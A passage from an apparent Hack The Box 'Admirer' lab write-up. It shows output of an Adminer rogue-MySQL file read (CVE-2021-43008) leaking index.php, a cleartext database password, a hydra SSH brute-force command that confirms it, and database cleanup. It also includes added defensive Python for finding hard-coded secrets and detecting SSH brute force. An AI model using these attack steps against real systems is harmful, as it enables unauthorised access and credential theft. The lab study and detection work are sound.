'\t\t\t\t\t\t\t\t</section>', '\t\t\t\t\t\t\t</div>', '\t\t\t\t\t\t</div>', '\t\t\t\t\t</footer>', '\xa0', '\t\t\t</div>', '\xa0', '\t\t<!-- Scripts -->', '\t\t\t<script src="assets/js/jquery.min.js"></script>', '\t\t\t<script src="assets/js/jquery.poptrox.min.js"></script>', '\t\t\t<script src="assets/js/browser.min.js"></script>', '\t\t\t<script src="assets/js/breakpoints.min.js"></script>', '\t\t\t<script src="assets/js/util.js"></script>', '\t\t\t<script src="assets/js/main.js"></script>', 
'\xa0', '\t</body>', '</html>']}}, {'num_rows': 1, 'fields': ['id?', 'select_type?', 'table?', 'partitions?', 'type?', 'possible_keys?', 'key?', 'key_len?', 'ref?', 'rows?', 'Extra?'], 'values': {'id?': ['1'], 'select_type?': ['SIMPLE'], 'table?': ['dump'], 'partitions?': ['NULL'], 'type?': ['ALL'], 'possible_keys?': ['NULL'], 'key?': ['NULL'], 'key_len?': ['NULL'], 'ref?': ['NULL'], 'rows?': ['123'], 'Extra?': ['\xa0']}}], 'messages': [], 'errors': [], 'success': True}
[+] (  4.52 kB) /var/www/html/index.php

It worked. The script pulled the /var/www/html/index.php file out of the target system.

Interestingly, there is another CLEARTEXT DB credential hard-coded into the index.php file. The DB credential is waldo:&<h5b~yK3F#{PaPB&dA}{H>
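A credential embedded in a PHP source file is exactly what a secret scan over the web root or a pre-commit hook should catch before deployment. As an added example, not part of this writeup and not code from Adminer or the Admirer box, the following Python scanner flags string literals assigned to password-like PHP variables and reports them with the value masked, and for contrast runs over a hardened variant that reads the same values from the process environment. Both PHP snippets, their variable names and values are constructed for the example and only mirror the shape of the dumped index.php.

```python
"""Added example: flag hard-coded credentials in PHP source and show the
environment-based alternative. The PHP samples below are constructed for
this example, not the real index.php from the box."""
import re
from dataclasses import dataclass

# String literals assigned to password-like PHP variables, e.g. $password = "...";
_SECRET_ASSIGN = re.compile(
    r'\$(?P<name>\w*(?:pass(?:word|wd)?|pwd|secret|token|api_?key)\w*)'
    r'\s*=\s*(?P<q>["\'])(?P<value>.*?)(?P=q)\s*;',
    re.IGNORECASE,
)


@dataclass
class Finding:
    line: int
    variable: str
    masked_value: str  # the full secret is never stored or printed


def mask(value: str) -> str:
    """Keep two characters at each end so the finding can be located, nothing more."""
    if len(value) <= 4:
        return "*" * len(value)
    return value[:2] + "*" * (len(value) - 4) + value[-2:]


def scan_php(source: str) -> list[Finding]:
    """Return one Finding per non-empty secret literal, with its 1-based line number."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        stripped = line.lstrip()
        if stripped.startswith(("//", "#", "*", "/*")):
            continue  # commented-out code is noise for this check
        for m in _SECRET_ASSIGN.finditer(line):
            if m.group("value") == "":
                continue  # empty placeholder, not a hard-coded secret
            findings.append(Finding(lineno, m.group("name"), mask(m.group("value"))))
    return findings


# Constructed sample mirroring the shape of the dumped index.php (values are made up).
VULNERABLE_PHP = """<?php
$servername = "localhost";
$username = "appuser";
$password = "s3cret-example-value";
$dbname = "appdb";
$conn = new mysqli($servername, $username, $password, $dbname);
"""

# Hardened variant: the secret lives outside the web root, in the process environment.
HARDENED_PHP = """<?php
$servername = getenv('DB_HOST');
$username = getenv('DB_USER');
$password = getenv('DB_PASSWORD');
$dbname = getenv('DB_NAME');
$conn = new mysqli($servername, $username, $password, $dbname);
"""

if __name__ == "__main__":
    for label, src in (("vulnerable", VULNERABLE_PHP), ("hardened", HARDENED_PHP)):
        for f in scan_php(src):
            print(f"{label}: line {f.line} ${f.variable} = {f.masked_value}")
```

The scanner reports only the variable name, line and a masked value, so its own output does not become a second copy of the secret in a ticket or CI log. The hardened snippet produces no findings because the literal is gone from the source tree; the environment (or a secrets manager) then becomes the thing to protect.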

I will append the newly found credential to the lists and attempt to find a valid credential by running a brute-force attack against the target SSH server

Validation


┌──(kali㉿kali)-[~/archive/htb/labs/admirer]
└─$ hydra -L users.txt -P passwords.txt ssh://$IP
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-11-16 21:06:10
[warning] many ssh configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[data] max 16 tasks per 1 server, overall 16 tasks, 119 login tries (l:17/p:7), ~8 tries per task
[data] attacking ssh://10.10.10.187:22/
[22][ssh] host: 10.10.10.187   login: waldo   password: &<h5b~yK3F#{PaPB&dA}{H>

The newly found credential is validated against the target SSH server
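Seen from the target, the hydra run above is a burst of failed SSH logins from one source followed by an accepted one. As an added example, not part of this writeup and not hydra's or the box's code, the following Python detector replays constructed sshd auth.log lines, raises an alert when one source reaches a failure threshold inside a sliding window, and raises a second alert when that same source then gets an accepted login, which is the signal that a credential was validated by guessing. Hostname, PIDs, ports and timestamps in the sample are constructed; the 60-second window and threshold of 5 are assumptions to tune per environment.

```python
"""Added example: detect SSH password brute force and the success that follows it
from sshd auth.log lines. The sample log lines are constructed for this example."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Matches the two sshd outcomes relevant here; any other sshd line is ignored.
_SSHD_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<outcome>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+ ssh2$"
)


def parse_sshd(line: str, year: int = 2023):
    """Return (timestamp, outcome, user, source_ip) or None for non-matching lines.
    syslog timestamps carry no year, so one is assumed."""
    m = _SSHD_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S").replace(year=year)
    return ts, m.group("outcome"), m.group("user"), m.group("ip")


def detect_bruteforce(lines, window=timedelta(seconds=60), threshold=5):
    """Return a list of (source_ip, alert_kind, detail) tuples.

    'bruteforce' fires once per source when failures inside the window reach
    the threshold; 'success_after_bruteforce' fires when a flagged source later
    gets an Accepted login. A lone failure followed by success (a user
    mistyping once) raises nothing."""
    recent_failures = defaultdict(list)  # ip -> failure timestamps inside the window
    usernames_tried = defaultdict(set)
    flagged = set()
    alerts = []
    for line in lines:
        rec = parse_sshd(line)
        if rec is None:
            continue
        ts, outcome, user, ip = rec
        # Slide the window: drop failures older than `window` relative to this event.
        recent_failures[ip] = [t for t in recent_failures[ip] if ts - t <= window]
        if outcome == "Failed":
            recent_failures[ip].append(ts)
            usernames_tried[ip].add(user)
            if len(recent_failures[ip]) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append((ip, "bruteforce",
                               f"{len(recent_failures[ip])} failures across "
                               f"{len(usernames_tried[ip])} usernames within "
                               f"{int(window.total_seconds())}s"))
        elif ip in flagged:
            alerts.append((ip, "success_after_bruteforce",
                           f"user {user} accepted after {len(recent_failures[ip])} recent failures"))
    return alerts


# Constructed sample: a guessing burst from one host that ends in an accepted
# login, then an unrelated host with a single typo followed by a clean login.
SAMPLE_AUTH_LOG = """\
Nov 16 21:06:10 admirer sshd[1201]: Failed password for invalid user admin from 10.10.16.8 port 51200 ssh2
Nov 16 21:06:10 admirer sshd[1203]: Failed password for invalid user root from 10.10.16.8 port 51201 ssh2
Nov 16 21:06:11 admirer sshd[1205]: Failed password for waldo from 10.10.16.8 port 51202 ssh2
Nov 16 21:06:11 admirer sshd[1207]: Failed password for invalid user ftpuser from 10.10.16.8 port 51203 ssh2
Nov 16 21:06:12 admirer sshd[1209]: Failed password for invalid user guest from 10.10.16.8 port 51204 ssh2
Nov 16 21:06:12 admirer sshd[1211]: Failed password for waldo from 10.10.16.8 port 51205 ssh2
Nov 16 21:06:13 admirer sshd[1213]: Accepted password for waldo from 10.10.16.8 port 51206 ssh2
Nov 16 21:20:00 admirer sshd[1300]: Failed password for waldo from 10.10.14.2 port 40000 ssh2
Nov 16 21:20:05 admirer sshd[1302]: Accepted password for waldo from 10.10.14.2 port 40001 ssh2
"""

if __name__ == "__main__":
    for ip, kind, detail in detect_bruteforce(SAMPLE_AUTH_LOG.splitlines()):
        print(f"{ip} {kind}: {detail}")
```

The second alert is the one worth paging on: a threshold alone only says someone is guessing, while an accepted login from a source that was just guessing says a credential has been confirmed and the account should be treated as compromised. Rate-limiting or key-only authentication on sshd removes the condition entirely; the detector is the compensating control when that is not possible.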

Manual


It can also be done manually from the Adminer interface on the target web server.

Cleanup


┌──(kali㉿kali)-[~/…/htb/labs/admirer/CVE-2021-43008]
└─$ sudo mysql -u root -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 442
Server version: 10.6.11-MariaDB-2 Debian n/a
 
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
MariaDB [(none)]> DROP TABLE rogue.dump;
Query OK, 0 rows affected (0.003 sec)
 
MariaDB [(none)]> DROP DATABASE rogue;
Query OK, 0 rows affected (0.001 sec)
 
MariaDB [(none)]> DROP USER fake@'%';
Query OK, 0 rows affected (0.002 sec)

Deleting the rogue table, database and user

┌──(kali㉿kali)-[~/…/htb/labs/admirer/CVE-2021-43008]
└─$ cat /etc/mysql/mariadb.conf.d/50-server.cnf | grep -i bind-address
bind-address            = 127.0.0.1
 
┌──(kali㉿kali)-[~/…/htb/labs/admirer/CVE-2021-43008]
└─$ sudo service mysqld stop                         

The bind address is back to localhost only and the instance is stopped